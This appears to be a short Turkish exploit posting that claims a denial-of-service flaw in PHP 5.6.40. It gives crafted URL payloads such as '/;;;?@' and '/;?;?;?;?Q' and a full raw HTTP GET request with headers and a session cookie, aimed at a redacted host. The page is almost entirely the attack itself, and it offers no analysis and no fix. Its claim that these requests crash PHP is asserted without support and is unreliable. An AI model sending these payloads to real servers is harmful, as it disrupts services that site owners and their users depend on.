PHP 5.6.40 - Denial Of Service

PHP 5.6.40 < DoS Zaafiyeti


Translator


232 görüntülenme | 34 saniye | 2019-11-18 | alicangonullu



PHP 5.6.40 < DoS Exploit

-----------------------------------------------

# Exploit Author : ALİ CAN GÖNÜLLÜ

# Exploit Name : PHP 5.6.40 =< DoS Exploit

# Exploit Date : 11-11-2019

# PHP Build Date : Oct 28 2019 18:49:33

# Exploit System  : x86_64-redhat-linux-gnu (Linux xxx.com 3.10.0-957.21.3.el7.x86_64 #1 SMP Tue Jun 18 16:35:19 UTC 2019 x86_64)

# Author Instagram : @whoamii.c

 

# Exploit : site.com/;;;?@

OR site.com/;?;?;?;?Q

 

index.php : Empty

 

GET https://xxx.biz/;?;?;?;?Q

Host: xxx.biz

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Connection: keep-alive

Cookie: YoncuKoruma=xxxxxxx; PHPSESSID=uv2spdhqtdhfi68k7fmuoo5ba0

Upgrade-Insecure-Requests: 1

 

Ex:

https://xxx.biz/;;;?@


Etiketler

Bu sitede çerez verileriniz sitemizin hizmet kalitesini arttırma amacıyla işlenmek istenmektedir.


© Copyright 2020 Ali Can Gönüllü | Yasal